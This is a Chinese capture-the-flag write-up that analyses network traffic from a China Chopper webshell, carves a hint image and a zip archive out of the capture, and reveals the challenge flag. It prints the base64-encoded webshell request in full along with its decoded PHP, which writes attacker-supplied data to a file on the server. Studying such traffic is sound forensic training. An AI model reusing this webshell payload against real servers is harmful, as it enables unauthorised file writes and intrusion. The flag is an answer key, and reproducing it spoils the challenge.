当前位置: 首页 > news >正文

202003_攻防世界_功夫再高也怕菜刀

Tags:流量分析,文件分离,WebShell

0x00. 题目

附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称:202003_攻防世界_功夫再高也怕菜刀.zip

0x01. WP

1. 分析流量请求,找到一图片上传请求

图片

![图片](https://img2024.cnblogs.com/blog/3693771/202509/3693771-20250920220808552-1143727563.png)
(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==
Base64_decoded=>@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();&z1=RDpcd2FtcDY0XHd3d1x1cGxvYWRcNjY2Ni5qcGc=
Base64_decoded=>D:\wamp64\www\upload\6666.jpg&z2=FFD8FFE000104A46494600010101007800780000FFDB004300... ...

即将z2内容写入到文件z1中,复制十六进制字符串另存后得到hint信息

图片

2. 导出下载的压缩包

继续查看流量,发现一包含flag.txt的压缩包数据
图片

导出十六进制转存后得到压缩包文件,使用hint信息解压后获得flag

flag为flag{3OpWdJ-JP6FzK-koCMAK-VkfWBq-75Un2z}

http://www.rkmt.cn/news/8738.html

相关文章:

  • 工业软件:重塑协同流程、降低制造成本的关键器具
  • 本地布署Qwen-Image全量蒸馏加速模型 - yi
  • 小米手机刷机+root权限
  • 深入解析:【智慧城市】2025年中国地质大学(武汉)暑期实训优秀作品(1):智绘旅程构建文旅新基建
  • 2025 CCPC 江西省赛 南昌邀请赛 ABCDEGHKL
  • Minimind-一个开源LLM项目的代码分析1:模型结构
  • 【深度学习新浪潮】数字孪生研发进展:从技术突破到代码实践 - 实践
  • basic - graph theory
  • 详细介绍:阻塞 IO为什么叫BIO,非阻塞IO为什么叫NIO,异步IO为什么叫AIO
  • 代码随想录算法训练营第四天 | leetcode 24
  • DP tricks
  • OpenCV的一些API的使用
  • 2971:抓住那头牛
  • MFC Button 控件完全指南:从基础到进阶 - 指南
  • vulnhub靶机:GoldenEye-v1
  • 深入解析:SpringMVC静态资源与Servlet容器指南
  • CCPC Online 2025 游寄
  • CentOS 7 容器时遇到了 yum update 报错
  • MIT新论文:数据即上限,扩散模型的关键能力来自图像统计规律,而非复杂架构
  • 基于MATLAB的视频动态目标跟踪检测搭建方案
  • 第三篇:Windows10/11软件集成与系统优化 - 教程
  • Windows-Appx
  • 详细介绍:《Vuejs设计与实现》第 16 章(解析器) 中
  • 【解决】Matlab函数体突然不自动缩进了
  • React+antd搭建监听localStorage变化多页面更新+纯js单页面table模糊、精确查询、添加、展示功能
  • 详细介绍:jeecg-boot3.7.0对接钉钉登录(OAuth2.0)
  • 题解:P13969 [VKOSHP 2024] Exchange and Deletion
  • 基于MATLAB的车牌识别系统 - 实践
  • Linux服务器上安装配置GitLab的步骤
  • 在Linux中设定账户密码的安全性策略